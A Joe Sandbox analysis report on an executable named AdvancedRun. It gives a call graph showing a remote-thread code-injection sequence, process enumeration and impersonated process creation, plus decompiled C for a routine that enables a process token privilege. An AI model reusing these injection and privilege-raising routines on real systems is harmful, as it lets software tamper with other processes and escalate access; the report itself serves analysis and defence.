405851 _wtoi 3730->3731 3732 401ac9 3731->3732 3889 40b550 3732->3889 3735 401af2 3891 40171f 3735->3891 3736 401c15 GetLastError 3738 401c13 3736->3738 3738->3658 3740 401b20 3894 405642 3740->3894 3741 401bf7 GetLastError 3743 401bff FindCloseChangeNotification 3741->3743 3745 4055d1 free 3743->3745 3744 401b2b memset _snwprintf 3746 4055d1 free 3744->3746 3745->3738 3747 401b82 3746->3747 3748 40559a 4 API calls 3747->3748 3749 401ba0 ReadProcessMemory 3748->3749 3751 401bc8 3749->3751 3899 4055f9 3751->3899 3756 4055d1 free 3757 401bf5 3756->3757 3757->3743 3759 403614 3758->3759 3760 40360a FreeLibrary 3758->3760 3759->3658 3760->3759 3762 4099e1 3761->3762 3763 4099da free 3761->3763 3762->3658 3763->3762 4373 40a0eb wcscpy 3764->4373 3770 40177c 20 API calls 3772 403049 3770->3772 3771 403020 3771->3770 3772->3658 4396 404ad9 GetModuleFileNameW 3773->4396 3775 402f65 wcsrchr 3776 402f7a 3775->3776 3777 402f7e wcscat 3775->3777 3776->3777 3778 402fa1 3777->3778 3779 402fb2 3777->3779 3781 404923 2 API calls 3778->3781 3780 402fc6 30 API calls 3779->3780 3782 402fc2 3780->3782 3781->3779 3782->3658 4397 40a0d7 wcscpy 3783->4397 3785 401790 3786 401a29 3785->3786 4398 40a0d7 wcscpy 3785->4398 3786->3658 3788 4019e2 3789 401a04 3788->3789 3793 40135c 13 API calls 3788->3793 4399 401676 3789->4399 3792 401a21 4409 4054b9 free free 3792->4409 3793->3789 3797 401d4c 3796->3797 3803 401d5c 3796->3803 3799 4022d5 210 API calls 3797->3799 3801 401d55 3799->3801 3800 401d90 3800->3658 3802 404baf GetVersionExW 3801->3802 3802->3803 3803->3800 4410 401c26 GetCurrentProcessId memset memset 3803->4410 3805 4047af 2 API calls 3804->3805 3806 404bf6 wcscat 3805->3806 3806->3669 4417 406597 3807->4417 3809 4065f1 GetModuleHandleW 4422 40645e 3809->4422 3813 406597 3 API calls 3812->3813 3814 406450 3813->3814 4496 406398 3814->4496 3817 408910 3818 408924 3817->3818 3819 4055f9 6 API calls 3818->3819 3820 4088df 3819->3820 3820->3688 3828 404c3c 3821->3828 3823 405467 3831 
4047af wcslen 3823->3831 3826 405494 3826->3702 3826->3706 3827 40548f LoadLibraryW 3827->3826 3829 404c4c GetSystemDirectoryW 3828->3829 3830 404c5d wcscpy 3828->3830 3829->3830 3830->3823 3832 4047ba 3831->3832 3833 4047cf wcscat LoadLibraryW 3831->3833 3832->3833 3834 4047c2 wcscat 3832->3834 3833->3826 3833->3827 3834->3833 3835->3720 3837 4055e4 3836->3837 3838 4055d7 free 3836->3838 3837->3721 3838->3837 3840 405516 3839->3840 3841 40550d free 3839->3841 3843 404951 3 API calls 3840->3843 3842 405520 3841->3842 3844 405530 free 3842->3844 3845 405539 3842->3845 3843->3842 3846 405545 memcpy 3844->3846 3847 404951 3 API calls 3845->3847 3846->3720 3848 405544 3847->3848 3848->3846 3850 404958 malloc 3849->3850 3851 40499e 3849->3851 3853 404994 3850->3853 3854 404979 3850->3854 3851->3720 3853->3720 3855 40498d free 3854->3855 3856 40497d memcpy 3854->3856 3855->3853 3856->3855 3858 4055b4 3857->3858 3859 4055a9 free 3857->3859 3860 404951 3 API calls 3858->3860 3861 4055bf 3859->3861 3860->3861 3861->3719 3878 408f92 3862->3878 3865 408ff2 3884 408f72 3865->3884 3866 408fea GetLastError 3867 408f5c 3866->3867 3867->3724 3867->3725 3869 408ff9 3870 409005 GetProcAddress 3869->3870 3871 40901c 3869->3871 3870->3871 3872 409012 LookupPrivilegeValueW 3870->3872 3873 408f72 8 API calls 3871->3873 3872->3871 3874 409035 3873->3874 3875 409053 GetLastError FindCloseChangeNotification 3874->3875 3876 409039 GetProcAddress 3874->3876 3875->3867 3876->3875 3877 409046 AdjustTokenPrivileges 3876->3877 3877->3875 3879 408f72 8 API calls 3878->3879 3880 408f9d 3879->3880 3881 408fa1 GetProcAddress 3880->3881 3882 408fc2 3880->3882 3881->3882 3883 408fb2 3881->3883 3882->3865 3882->3866 3883->3882 3885 408f77 3884->3885 3886 408f8e 3884->3886 3887 405436 8 API calls 3885->3887 3886->3869 3888 408f81 3887->3888 3888->3869 3890 401ad6 OpenProcess 3889->3890 3890->3735 3890->3736 3982 404fa4 memset 3891->3982 3893 401745 ReadProcessMemory 3893->3740 3893->3741 3895 405648 
[Call graph excerpt. In the original report this is an interactive function-level control-flow graph; what survives here is its node/edge data: a node is declared as "<id> <code address> [API ...]" and an edge as "<id>-><id>". The excerpt begins and ends mid-graph. Recoverable API call sequences, by the address of the code that issues them:
40a46c: OpenProcess, GetModuleHandleW, GetProcAddress, VirtualAllocEx (x2), WriteProcessMemory (x2), then via 40a272 (GetVersionExW, LoadLibraryW, GetProcAddress) CreateRemoteThread, ResumeThread, WaitForSingleObject, CloseHandle, ReadProcessMemory, VirtualFreeEx (x2), FreeLibrary; GetLastError on each failure path. This is the standard remote-thread code-injection sequence into another process.
4095fd: CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, OpenProcess, QueryFullProcessImageNameW, K32GetModuleFileNameExW (resolved via GetProcAddress), GetProcessTimes, GetVersionExW: process enumeration and identification.
4022d5 / 401fe6: ExpandEnvironmentStringsW, SearchPathW, GetEnvironmentStringsW, SetEnvironmentVariableW, OpenSCManagerW, OpenServiceW, QueryServiceStatus, StartServiceW, ImpersonateLoggedOnUser, RevertToSelf, CreateProcessW, OpenProcess: command-line and environment handling, service start, and process creation under an impersonated token.
401a3f: GetProcessAffinityMask, SetProcessAffinityMask.
40598b / 409a94: OpenProcess, OpenProcessToken; 4028a5: LoadLibraryW followed by four GetProcAddress calls (dynamic API resolution).
401c79: GetModuleFileNameW, ShellExecuteExW, WaitForSingleObject, GetExitCodeProcess: launches a process from a path built on the sample's own module path and waits for it.
40b04d / 405fac / 406337 / 40467a: GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileIntW, EnumResourceNamesW, LoadStringW, RegOpenKeyExW, RegCloseKey, GetWindowsDirectoryW, CoInitialize: version-info, INI, resource and registry access.
GUI and I/O: dialog procedures built on GetDlgItem, SendMessageW, SendDlgItemMessageW, SetWindowPos, DeferWindowPos, GetKeyState, EndDialog; DragAcceptFiles, DragQueryFileW, DragFinish; SHGetFileInfoW, SHGetPathFromIDListW; qsort; WideCharToMultiByte and WriteFile for text output; _XcptFilter, _exit, _c_exit in the CRT epilogue.]
405e8d 5463->5478 5465 40632d 5466 40622f LoadMenuW 5485 40605e 5466->5485 5467 405e8d 2 API calls 5470 406294 CreateDialogParamW 5467->5470 5469->5465 5469->5467 5472 4062b2 GetDesktopWindow CreateDialogParamW 5470->5472 5473 4062c6 memset GetWindowTextW 5470->5473 5472->5473 5474 406300 5473->5474 5475 406315 EnumChildWindows DestroyWindow 5473->5475 5476 405fac 3 API calls 5474->5476 5475->5465 5477 406312 5476->5477 5477->5475 5479 405e9d 5478->5479 5481 405e92 _snwprintf 5478->5481 5479->5481 5482 405ebb 5479->5482 5481->5466 5483 405ed0 wcscpy 5482->5483 5484 405edc 5482->5484 5483->5484 5484->5466 5486 40b550 5485->5486 5487 40606e GetMenuItemCount 5486->5487 5488 406148 DestroyMenu 5487->5488 5489 406088 memset GetMenuItemInfoW 5487->5489 5488->5465 5492 4060d9 5489->5492 5490 4060e0 wcschr 5490->5492 5491 40605e 5 API calls 5491->5492 5492->5488 5492->5489 5492->5490 5492->5491 5493 406025 5 API calls 5492->5493 5493->5492 5500 40a10f WritePrivateProfileStringW 5501 40b590 5502 40b23c 2 API calls 5501->5502 5503 40b59a 5502->5503 5507 401093 5508 401270 5507->5508 5509 4010ab 5507->5509 5510 4012a6 SetDlgItemTextW 5508->5510 5511 40127a GetDlgItem ShowWindow GetDlgItem ShowWindow 5508->5511 5512 401231 5509->5512 5513 4010b2 5509->5513 5514 4012b9 SetWindowTextW SetDlgItemTextW SetDlgItemTextW 5510->5514 5511->5514 5517 401252 EndDialog DeleteObject 5512->5517 5536 401113 5512->5536 5515 4011d3 GetDlgItem 5513->5515 5516 4010bb 5513->5516 5538 40103e 5514->5538 5519 4011e8 SetBkMode SetTextColor GetSysColorBrush 5515->5519 5520 40120e 5515->5520 5521 401151 GetDlgItem ChildWindowFromPoint 5516->5521 5522 4010c6 5516->5522 5517->5508 5519->5536 5527 40121c GetDlgItem 5520->5527 5520->5536 5523 4011a4 5521->5523 5524 401187 GetModuleHandleW LoadCursorW SetCursor 5521->5524 5526 4010ce GetDlgItem ChildWindowFromPoint 5522->5526 5522->5536 5528 4011b2 GetDlgItem ChildWindowFromPoint 5523->5528 5523->5536 5524->5536 5530 401104 5526->5530 5531 40111d 5526->5531 
5532 40122f 5527->5532 5527->5536 5534 4011d1 5528->5534 5528->5536 5529 404da9 10 API calls 5529->5536 5537 404f7e ShellExecuteW 5530->5537 5533 40112b GetDlgItem ChildWindowFromPoint 5531->5533 5531->5536 5532->5519 5533->5530 5533->5536 5534->5524 5537->5536 5543 404aeb memset wcscpy 5538->5543 5540 40104d CreateFontIndirectW SendDlgItemMessageW 5541 401090 5540->5541 5542 40107c SendDlgItemMessageW 5540->5542 5541->5529 5542->5541 5543->5540 5544 407294 5545 4072a3 5544->5545 5548 404c96 5545->5548 5549 404cac 5548->5549 5557 404ca5 5548->5557 5558 404c70 modf 5549->5558 5551 404cd7 5559 404c70 modf 5551->5559 5553 404d39 5560 404c70 modf 5553->5560 5555 404d63 5561 404c70 modf 5555->5561 5558->5551 5559->5553 5560->5555 5561->5557 5562 402b16 5565 408dc8 5562->5565 5564 402b24 5566 408dd4 5565->5566 5567 408dd9 memcpy memcpy GetModuleHandleW DialogBoxParamW 5565->5567 5566->5564 5567->5564 5568 40b217 _onexit 5569 40a998 5570 40a9bc 5569->5570 5571 40a99f 5569->5571 5570->5571 5572 40a9c3 CompareFileTime 5570->5572 5572->5571 5576 402b9c 5577 405ce7 GetModuleHandleW 5576->5577 5578 402bb7 CreateDialogParamW 5577->5578 5583 405e0a 5578->5583 5584 405e17 5583->5584 5585 402bc8 5584->5585 5586 405e2e memset 5584->5586 5593 405d6a 5585->5593 5587 405e8d 2 API calls 5586->5587 5588 405e52 5587->5588 5589 405f39 3 API calls 5588->5589 5590 405e63 5589->5590 5591 405e7a EnumChildWindows 5590->5591 5592 405e6a SetWindowTextW 5590->5592 5591->5585 5592->5591 5594 405d76 5593->5594 5595 402bd0 ShowWindow UpdateWindow 5593->5595 5596 405d91 5594->5596 5597 405d89 EnumChildWindows 5594->5597 5598 405d97 EnumChildWindows 5596->5598 5599 405d9f 5596->5599 5597->5596 5598->5599 5601 404fbb GetWindowLongW SetWindowLongW 5599->5601 5601->5595 5602 409f9c 5603 40a03c memset memset memset _snwprintf _snwprintf 5602->5603 5604 409fbc memset memset _snwprintf _snwprintf 5602->5604 5605 40a037 5603->5605 5604->5605 5609 4038a3 5610 4038c3 5609->5610 5611 403a2a 5609->5611 5615 
4038df 5610->5615 5616 402caf GetWindowPlacement 5610->5616 5612 403a41 5611->5612 5617 403ec3 2 API calls 5611->5617 5752 402d2e 5612->5752 5618 403ec3 2 API calls 5615->5618 5616->5615 5617->5612 5619 4038e6 5618->5619 5621 40467a 5 API calls 5619->5621 5623 403920 5619->5623 5620 403954 5655 40399e 5620->5655 5682 402923 memset 5620->5682 5622 4038f9 5621->5622 5624 403908 5622->5624 5625 4038fd 5622->5625 5623->5620 5629 40149f 12 API calls 5623->5629 5664 404415 5624->5664 5658 4045ba 5625->5658 5626 4039b8 5633 4039c6 5626->5633 5702 4037dd memset memset 5626->5702 5628 403965 5683 401000 5628->5683 5636 403937 5629->5636 5634 4039d5 5633->5634 5715 4035af 5633->5715 5641 4039e4 5634->5641 5722 40344d memset 5634->5722 5642 4013e1 9 API calls 5636->5642 5637 403904 5643 40467a 5 API calls 5637->5643 5647 403a07 5641->5647 5651 405b81 16 API calls 5641->5651 5648 403946 5642->5648 5644 403913 5643->5644 5649 403b16 17 API calls 5644->5649 5645 401000 wcsncat 5650 40398c 5645->5650 5647->5612 5738 4034f0 5647->5738 5681 4054b9 free free 5648->5681 5649->5623 5687 402b79 5650->5687 5654 4039f4 5651->5654 5733 40acfc SHGetMalloc 5654->5733 5655->5626 5690 4036d5 memset memset 5655->5690 5659 4045c7 5658->5659 5660 4043f8 RegOpenKeyExW 5659->5660 5661 4045d8 5660->5661 5662 4045e0 7 API calls 5661->5662 5663 404675 5661->5663 5662->5663 5663->5637 5665 404422 5664->5665 5666 4043f8 RegOpenKeyExW 5665->5666 5667 404433 5666->5667 5668 4045b3 5667->5668 5669 40443b memset _snwprintf 5667->5669 5668->5637 5756 409ecc RegCreateKeyExW 5669->5756 5671 40448b 5672 4045a8 RegCloseKey 5671->5672 5757 409ef4 wcslen RegSetValueExW 5671->5757 5672->5668 5674 4044aa RegCloseKey memset 5758 404ad9 GetModuleFileNameW 5674->5758 5676 4044e0 5676->5672 5677 4044f1 GetDriveTypeW 5676->5677 5677->5672 5678 404527 memset memset _snwprintf _snwprintf 5677->5678 5759 409f1a 5678->5759 5681->5620 5682->5628 5684 401037 5683->5684 5685 40103b 5684->5685 5686 40100e wcsncat 5684->5686 
5685->5645 5686->5684 5688 405ce7 GetModuleHandleW 5687->5688 5689 402b91 DialogBoxParamW 5688->5689 5689->5655 5691 405b81 16 API calls 5690->5691 5692 403734 5691->5692 5693 405b81 16 API calls 5692->5693 5694 403744 5693->5694 5768 405236 memset 5694->5768 5697 405b81 16 API calls 5698 403766 GetSaveFileNameW 5697->5698 5699 4037d9 5698->5699 5700 4037b9 wcscpy 5698->5700 5699->5626 5771 40365e 5700->5771 5703 405b81 16 API calls 5702->5703 5704 40383d 5703->5704 5705 405b81 16 API calls 5704->5705 5706 40384d 5705->5706 5707 405236 6 API calls 5706->5707 5708 403866 5707->5708 5709 405b81 16 API calls 5708->5709 5710 40386f 5709->5710 5781 40507a GetOpenFileNameW 5710->5781 5712 40388c 5713 40389c 5712->5713 5714 40365e 32 API calls 5712->5714 5713->5633 5714->5713 5716 401d40 220 API calls 5715->5716 5717 4035dd 5716->5717 5718 4035eb 5717->5718 5784 4047d2 5717->5784 5720 4035fb FreeLibrary 5718->5720 5721 4035f7 5720->5721 5721->5634 5723 405b81 16 API calls 5722->5723 5724 403490 5723->5724 5725 405b81 16 API calls 5724->5725 5726 4034a0 5725->5726 5727 405236 6 API calls 5726->5727 5728 4034b9 5727->5728 5729 405b81 16 API calls 5728->5729 5730 4034c2 5729->5730 5731 40507a 2 API calls 5730->5731 5732 4034dc 5731->5732 5732->5641 5734 40ad16 SHBrowseForFolderW 5733->5734 5736 40ad6c 5733->5736 5735 40ad4a SHGetPathFromIDListW 5734->5735 5734->5736 5735->5736 5737 40ad5c wcscpy 5735->5737 5736->5647 5737->5736 5739 4034fd 5738->5739 5799 402923 memset 5739->5799 5741 40350b 5800 406670 5741->5800 5744 40a909 memset 5745 40354a 5744->5745 5810 402cd5 5745->5810 5748 403586 5813 4067ac 5748->5813 5749 403569 _ultow 5749->5748 5751 40359d 5751->5611 5753 402d62 5752->5753 5754 402d3b 5752->5754 5754->5753 5755 402d52 EndDialog 5754->5755 5755->5753 5756->5671 5757->5674 5758->5676 5766 409eb3 RegOpenKeyExW 5759->5766 5761 409f35 5762 4045a5 5761->5762 5767 409ef4 wcslen RegSetValueExW 5761->5767 5762->5672 5764 409f4c RegCloseKey 5764->5762 5766->5761 
5767->5764 5769 40526f _snwprintf wcslen memcpy wcslen memcpy 5768->5769 5769->5769 5770 40375d 5769->5770 5770->5697 5772 403670 5771->5772 5773 40a0eb 2 API calls 5772->5773 5774 4036a1 5773->5774 5775 40177c 20 API calls 5774->5775 5776 4036b0 5775->5776 5777 403616 9 API calls 5776->5777 5779 4036b9 5777->5779 5778 4036cf 5778->5699 5779->5778 5780 403ec3 2 API calls 5779->5780 5780->5778 5782 4050dd 5781->5782 5783 4050cd wcscpy 5781->5783 5782->5712 5783->5712 5785 4047df 5784->5785 5786 4047e6 GetLastError 5785->5786 5787 4047ee 5785->5787 5786->5787 5790 404706 5787->5790 5791 404723 LoadLibraryExW 5790->5791 5792 40473a FormatMessageW 5790->5792 5791->5792 5795 404735 5791->5795 5793 404753 wcslen 5792->5793 5794 404778 wcscpy 5792->5794 5796 404760 wcscpy 5793->5796 5797 40476d LocalFree 5793->5797 5798 404787 _snwprintf MessageBoxW 5794->5798 5795->5792 5796->5797 5797->5798 5798->5718 5799->5741 5829 404fa4 memset 5800->5829 5802 40668b ??2@YAPAXI 5803 4066c9 ??2@YAPAXI 5802->5803 5805 4066ea ??2@YAPAXI 5803->5805 5807 40670b ??2@YAPAXI 5805->5807 5809 403521 memset 5807->5809 5809->5744 5811 402b79 2 API calls 5810->5811 5812 402ce3 5811->5812 5812->5748 5812->5749 5830 406746 5813->5830 5816 4067cd 5818 4067e0 5816->5818 5820 4055d1 free 5816->5820 5817 4055d1 free 5819 4067c6 ??3@YAXPAX 5817->5819 5821 4067f3 5818->5821 5823 4055d1 free 5818->5823 5819->5816 5822 4067d9 ??3@YAXPAX 5820->5822 5824 4055d1 free 5821->5824 5827 406806 5821->5827 5822->5818 5825 4067ec ??3@YAXPAX 5823->5825 5826 4067ff ??3@YAXPAX 5824->5826 5825->5821 5826->5827 5828 406837 free 5827->5828 5828->5751 5829->5802 5831 406751 ??3@YAXPAX 5830->5831 5832 406758 5830->5832 5831->5832 5833 406766 5832->5833 5834 40675f ??3@YAXPAX 5832->5834 5835 406770 ??3@YAXPAX 5833->5835 5836 406777 5833->5836 5834->5833 5835->5836 5837 406797 5836->5837 5838 406790 ??3@YAXPAX 5836->5838 5839 406787 ??3@YAXPAX 5836->5839 5837->5816 5837->5817 5838->5837 5839->5838 5840 407e24 memset memset 
5841 407e6e 5840->5841 5842 407250 2 API calls 5841->5842 5843 407e7a _snwprintf 5842->5843 5844 407343 6 API calls 5843->5844 5845 407ea7 5844->5845 5846 40b225 __dllonexit 5847 40aba5 5848 40ac15 5847->5848 5849 40abb7 BeginDeferWindowPos 5847->5849 5852 40ac26 5848->5852 5858 402ec8 6 API calls 5848->5858 5850 402e22 3 API calls 5849->5850 5853 40abdc 5850->5853 5854 402e22 3 API calls 5853->5854 5855 40abeb 5854->5855 5856 402e22 3 API calls 5855->5856 5857 40abfb EndDeferWindowPos InvalidateRect 5856->5857 5857->5852 5858->5852 5859 40a726 5860 40a733 5859->5860 5862 40a750 5859->5862 5863 406d12 5860->5863 5864 406d27 5863->5864 5865 406d3b 5863->5865 5869 4033c7 SendMessageW 5864->5869 5867 4033c7 SendMessageW 5865->5867 5868 406d2c 5867->5868 5868->5862 5870 4033df 5869->5870 5870->5868 5871 402b26 5872 402b32 ExitProcess 5871->5872 5873 402b3a 5871->5873 5874 405d6a 4 API calls 5873->5874 5876 402b56 5873->5876 5874->5876 5875 402b5d SetWindowLongW 5877 402b6a 5875->5877 5876->5875 5876->5877 5878 40b6a6 5879 40b6b6 5878->5879 5880 40b6af ??3@YAXPAX 5878->5880 5881 40b6c6 5879->5881 5882 40b6bf ??3@YAXPAX 5879->5882 5880->5879 5883 40b6d6 5881->5883 5884 40b6cf ??3@YAXPAX 5881->5884 5882->5881 5885 40b6e6 5883->5885 5886 40b6df ??3@YAXPAX 5883->5886 5884->5883 5886->5885 5887 40b5a8 5888 40171f memset 5887->5888 5889 40b5b3 5888->5889 5890 40b23c 2 API calls 5889->5890 5891 40b5d6 5890->5891 5892 40a1a9 5895 409e82 5892->5895 5894 40a1d7 5896 409ea0 GetPrivateProfileIntW 5895->5896 5897 409e8e 5895->5897 5896->5894 5900 409d12 memset _itow WritePrivateProfileStringW 5897->5900 5899 409e9b 5899->5894 5900->5899 5901 402aaa 5902 402ab6 5901->5902 5903 405e0a 8 API calls 5902->5903 5907 402add 5902->5907 5904 402aca 5903->5904 5911 40588e 5904->5911 5906 402b6a 5907->5906 5908 405d6a 4 API calls 5907->5908 5910 402b56 5907->5910 5908->5910 5909 402b5d SetWindowLongW 5909->5906 5910->5906 5910->5909 5912 4058a9 ??2@YAPAXI memset memcpy 5911->5912 5914 405898 
5911->5914 5913 4058ec ??3@YAXPAX 5912->5913 5915 4058f3 5912->5915 5913->5915 5914->5912 5914->5915 5915->5907 5916 40a92b 5917 40a980 _itow 5916->5917 5918 40a93e 5916->5918 5919 40a947 5917->5919 5918->5919 5920 40a961 wcschr 5918->5920 5921 40a944 5918->5921 5920->5919 5921->5919 5923 404ed0 5921->5923 5924 404ee1 5923->5924 5925 404ee9 FileTimeToSystemTime 5923->5925 5924->5925 5927 404f69 wcscpy 5924->5927 5926 404ef8 5925->5926 5925->5927 5926->5927 5928 404f00 GetDateFormatW GetTimeFormatW wcscpy wcscat wcscat 5926->5928 5929 404f78 5927->5929 5928->5929 5929->5919 5933 40a12c 5934 409e82 4 API calls 5933->5934 5935 40a14c 5934->5935 5936 405dac 5937 40b550 5936->5937 5938 405db9 memset GetDlgCtrlID 5937->5938 5939 405edd 5 API calls 5938->5939 5940 405ded 5939->5940 5941 405e03 5940->5941 5942 405df3 SetWindowTextW 5940->5942 5942->5941 5943 40a82d 5944 402ddd 6 API calls 5943->5944 5945 40a842 5944->5945 5946 402d78 10 API calls 5945->5946 5947 40a849 GetDlgItem 5946->5947 5958 4068ec 5947->5958 5951 40a8ce 5975 407f8d 5951->5975 5952 40a885 5952->5951 5972 403213 5952->5972 5955 40a8d5 5985 40ab39 5955->5985 5959 4068fd 5958->5959 5960 406746 5 API calls 5959->5960 5961 406907 ??2@YAPAXI ??2@YAPAXI 5960->5961 5962 40695c memcpy memcpy 5961->5962 5963 4069a1 5962->5963 5963->5962 5964 4069d9 ??2@YAPAXI ??2@YAPAXI 5963->5964 5967 405b81 16 API calls 5963->5967 5965 406a18 5964->5965 5966 406a23 5964->5966 5994 406607 5965->5994 5998 40686c 5966->5998 5967->5963 5970 406a69 5971 408157 SendMessageW SendMessageW 5970->5971 5971->5952 5973 403239 SendMessageW 5972->5973 5974 40322f wcslen 5972->5974 5973->5952 5974->5973 5976 408053 5975->5976 5977 407fb3 5975->5977 5978 408089 11 API calls 5976->5978 5979 40805b ImageList_Create ImageList_SetImageCount SendMessageW 5976->5979 5980 408024 ImageList_Create ImageList_SetImageCount 5977->5980 5981 407fbb memset memset GetWindowsDirectoryW SHGetFileInfoW 5977->5981 6015 40331d SendMessageW 5978->6015 5979->5978 
5982 408044 SendMessageW 5980->5982 5981->5982 5982->5976 5984 408142 SendMessageW 5984->5955 5986 40a8f5 SetFocus 5985->5986 5987 40ab45 5985->5987 5987->5986 5988 406ccb SendMessageW 5987->5988 5989 40ab56 _wcsicmp 5987->5989 5988->5987 5989->5987 5990 40ab73 5989->5990 5991 40684f SendMessageW 5990->5991 5992 40ab80 SendMessageW 5991->5992 5993 40684f SendMessageW 5992->5993 5993->5986 5995 406611 ??2@YAPAXI 5994->5995 5996 40660e 5994->5996 5997 406637 5995->5997 5996->5995 5997->5966 5997->5997 5999 4055d1 free 5998->5999 6000 406875 5999->6000 6001 4055d1 free 6000->6001 6002 40687d 6001->6002 6003 4055d1 free 6002->6003 6004 406885 6003->6004 6005 4055d1 free 6004->6005 6006 40688d 6005->6006 6007 40559a 4 API calls 6006->6007 6008 4068a0 6007->6008 6009 40559a 4 API calls 6008->6009 6010 4068aa 6009->6010 6011 40559a 4 API calls 6010->6011 6012 4068b4 6011->6012 6013 40559a 4 API calls 6012->6013 6014 4068be 6013->6014 6014->5970 6015->5984 6016 4030ad 6017 4030d3 6016->6017 6018 4030b6 6016->6018 6019 40304d 3 API calls 6018->6019 6020 4030bf 6019->6020 6020->6017 6021 4030c3 _wtoi 6020->6021 6021->6017 6022 407ead 6023 407eb5 6022->6023 6024 407ebc 6022->6024 6025 405b81 16 API calls 6023->6025 6026 407eba 6025->6026 6027 406ab1 6029 406ac2 6027->6029 6028 406b07 6030 406b7b 6028->6030 6032 406b5d _wcsicmp 6028->6032 6029->6028 6031 406aff _wcsicmp 6029->6031 6031->6028 6032->6028 4510 40a33b FindResourceW 4511 40a354 SizeofResource 4510->4511 4514 40a37e 4510->4514 4512 40a365 LoadResource 4511->4512 4511->4514 4513 40a373 LockResource 4512->4513 4512->4514 4513->4514 4515 40b23c 4518 40b216 4515->4518 4517 40b245 4519 40b225 __dllonexit 4518->4519 4520 40b21f _onexit 4518->4520 4519->4517 4520->4519

                                                                  Executed Functions

                                                                  Control-flow Graph

                                                                  C-Code - Quality: 100%
                                                                  			// Enables the privilege named in _a4 (e.g. a debug privilege) in the current process token.
                                                                  			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
                                                                  				void* _v8;                          // token handle
                                                                  				intOrPtr _v12;                      // overlays _v24.Privileges[0].Attributes
                                                                  				struct _TOKEN_PRIVILEGES _v24;
                                                                  				void* __esi;
                                                                  				_Unknown_base(*)()* _t16;
                                                                  				_Unknown_base(*)()* _t18;
                                                                  				long _t19;
                                                                  				_Unknown_base(*)()* _t22;
                                                                  				_Unknown_base(*)()* _t24;
                                                                  				struct HINSTANCE__** _t35;
                                                                  				void* _t37;
                                                                  
                                                                  				_t37 = __eflags;
                                                                  				_t35 = __eax;
                                                                  				// E00408F92 resolves OpenProcessToken via GetProcAddress; 0x28 = TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY
                                                                  				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
                                                                  					return GetLastError();
                                                                  				}
                                                                  				_t16 = E00408F72(_t35); // makes sure the module handle at *_t35 is available for the lookups below
                                                                  				__eflags = _t16;
                                                                  				if(_t16 != 0) {
                                                                  					// API resolved at run time rather than through the import table
                                                                  					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
                                                                  					__eflags = _t24;
                                                                  					if(_t24 != 0) {
                                                                  						// fills Privileges[0].Luid with the LUID of the privilege named in _a4
                                                                  						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
                                                                  					}
                                                                  				}
                                                                  				_v24.PrivilegeCount = 1;
                                                                  				_v12 = 2;               // Privileges[0].Attributes = SE_PRIVILEGE_ENABLED
                                                                  				_a4 = _v8;              // the argument slot is reused to hold the token handle
                                                                  				_t18 = E00408F72(_t35);
                                                                  				__eflags = _t18;
                                                                  				if(_t18 != 0) {
                                                                  					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
                                                                  					__eflags = _t22;
                                                                  					if(_t22 != 0) {
                                                                  						// enables the privilege in the process token
                                                                  						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
                                                                  					}
                                                                  				}
                                                                  				// ERROR_SUCCESS, or ERROR_NOT_ALL_ASSIGNED when the token does not hold the privilege
                                                                  				_t19 = GetLastError();
                                                                  				FindCloseChangeNotification(_v8); // executed; closes the token handle opened above
                                                                  				return _t19;
                                                                  			}


                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                    • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                  • GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                  • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
                                                                  • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
                                                                  • AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
                                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
                                                                  • String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
                                                                  • API String ID: 616250965-1253513912
                                                                  • Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                  • Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
                                                                  • Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                  • Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  C-Code - Quality: 83%
                                                                  			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
                                                                  				WCHAR* _v8;
                                                                  				signed int _v12;
                                                                  				int _v16;
                                                                  				int _v20;
                                                                  				char* _v24;
                                                                  				int _v28;
                                                                  				intOrPtr _v32;
                                                                  				int _v36;
                                                                  				int _v40;
                                                                  				char _v44;
                                                                  				void* _v56;
                                                                  				int _v60;
                                                                  				char _v92;
                                                                  				void _v122;
